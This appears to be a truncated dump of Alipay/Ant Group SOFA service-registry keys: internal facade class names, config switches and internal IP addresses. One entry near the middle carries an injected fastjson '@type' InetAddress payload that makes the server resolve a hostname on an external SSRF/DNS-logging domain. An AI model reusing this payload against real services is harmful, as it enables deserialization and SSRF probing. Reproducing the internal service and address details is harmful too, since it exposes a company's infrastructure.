DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.archimedes.common.service.facade.api.PushContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.reward.api.RewardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.GzoneLogicDbBalanceProfitRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExStandardProductRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.UserArchiveFacade:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_R_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_169.254.76.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.basicnamecontrol.BasicNameControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.InnerDecisionService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.FundPoolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adgdcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dmeta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.DailyCutDRM.openDailyCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPWorkflowManageFacade:1.0:bpWorkflowManageFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:bbcmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@gfmac#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alibaba.drc.rm.endpoint.operation.facade.OperationAntqwriterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.userview.facade.UserLabelOperateService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITINT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.contract.ContractManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpartner.common.service.facade.ApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.SwitchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.astaralarm.common.service.facade.tvm.EmpDeptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedContract2NewSyncDrmImpl.syncDataUpdateToS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_FINSUPPORT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fraudmng.common.service.facade.domain.BusinessDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.InstanceApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilesearch.biz.rest.SyncRecordFromOuterRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.zoneWhiteListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custinsight.common.service.facade.paychannel.PayChannelGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_TEST_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.50.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AppInfoQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketMessageBoxFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.27.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.goldetf.api.GoldtransAssetLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.OauthLoginTokenServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.MerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.mng.resource.ResourceMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSpuCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.gift.api.MiniGiftTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesQuotationOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.196.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inskgmng.common.service.facade.WorkbenchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditquery.common.api.PcreditQueryBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.IaftransSettleInitParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.ProductApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mytradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.dont-load-plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebill.service.facade.TransformConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.das.biz.share.config.DasTenantParamConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qagraphknowledge.common.service.facade.qacd.ChangeAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.ceres.AssetCeresProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ipwhitelist.IpWhiteListManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.EmployeeSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.domain.RuleDomainService:1.0:promo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdVerifiCationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.58.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.biz.memory.UserMemoryManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.core.common.antprocess.BPFlowService:1.0:assetReverseApplyBpFlowService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.verify.api.SecurityVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mcaplatformunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0:ComplianceTech@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.AcpProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.contentv2.ContentTopicRelV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.fundplatform.service.query.FundHongbaoQueryUnitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfsettle.facade.api.WriteoffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwt3634.dev.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.information.api.article.NewsManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.paymentmng.core.cache.drm.FunctionControlDRMControl.paymentConfigWriteDBSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zcore.facade.imageaudit.ZImageAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.core.service.sourcequote.SourceQuoteFetchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.242.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PROMODMP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.PDFSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.modelcenter.core.runtime.drm.SimpleModelResourceWaitTimeResource.waitTime,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.166.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.malgo.common.facade.OraConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.keeper.service.VipDomainOpsFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.cmndata.common.service.facade.CommonBizOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcore.common.service.facade.api.asset.AssetFreezeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbidishSpecConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@supportprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.CfpSpecialTransferQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:xnncloudmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loadcenter.common.service.openapi.SceneServiceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.recommend.CashierHomeRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alphaq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pledgecore.common.service.facade.spi.PledgeAssetConsultService:1.0:yebcorePledgeAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","acts.sofa.test.facade.ActsTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.rateOfWrite,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.zpaas.biz.ops.common.ReleaseDrmResource.disableFreePubDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.simulated.api.SatransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.FieldControlConfigResourceImpl.supportFieldTypeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.team.common.service.api.message.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.idatacontext.common.service.client.DataContextClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingRecoveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_T#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.livekit.LiveInteractiveScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreconcenter.common.service.facade.api.BillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstestmng.bizservice.IndustryStressConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.core.schduler.v2.resourcemanager.service.decision.ResourceDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:repeatLicenseAuditExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zproxy.xfire#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.SimulateModeFixedData2NewDrmImpl.simulateModeFixedData2NewLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antchaos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.QuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.OrgControlQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.ficc.goldb2c.api.BackendTransMngOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:PromoPlatform_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.yebMainPagedoubleCheckProportion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.ComplainFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:{\"@type\": \"java.net.InetAddress\",\"val\":\"MzMwMjQ4NjktdW5pcXVlSWQtMTIxMDAxMDAz.ssrf.noble.log.lynnshare.cc\"}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksupplychainprod.common.service.facade.trade.api.ScpTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.EnterpriseAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frastress.common.service.facade.kpi.KpiRecordValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.cache.facade.CacheQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.PartnerTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:frservcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.227.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smsgw.common.service.facade.SmsQueryOfflineFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:utraffictrip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:rpc-route-rz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.RemoteServiceDrmResource.permLimitFilterRulePkgNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.70.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:ebppcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.blackmirror.BlackMirrorMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialScopeManageV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingboss.common.service.api.ClearingRuleModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.common.InvestChartFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FundInfoRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.HoloxRiskSampleUrlManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.recommend.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apgauss.common.service.facade.api.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.EntityDiagnosisResponseReceiver:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:APPXCORE_PUBLIC@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableDatacollect,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.update.AppOpsLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.point.api.PttransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","finorm@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcache:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:personalprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.agg.api.AggStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.process.config.ProcessConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.lmb.facade.LMBAssetEquityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MOBILEBC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opsconsole.facade.request.CommonRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.permission.v2.AlipayCardPermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.spcenter.facade.operation.OperRecruitEnrollQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.news.api.channel.NewsChannelGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_FRDECISION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.chaos.dig.facade.ArchDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.goods.ShopGoodsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransPrePaymentTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:emccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.domains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.QualityCheckAsyncTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vostroflux.service.api.VostroFloodTradeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paychecker.facade.api.PromoCampInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fuelprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.134.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.100.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.goldetfprod.common.service.facade.openaccount.CheckUnregisterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.thirdpart.service.facade.StoreRedirectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.withholdMaxCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.prodmng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_LOGISTICFINANCEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.finriskcenter.common.facade.api.guardian.SystemMgntServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.uni.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_YEBB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@insassetprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.lczVoucherMaxOverPublishRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_BX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_FUND_SCHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.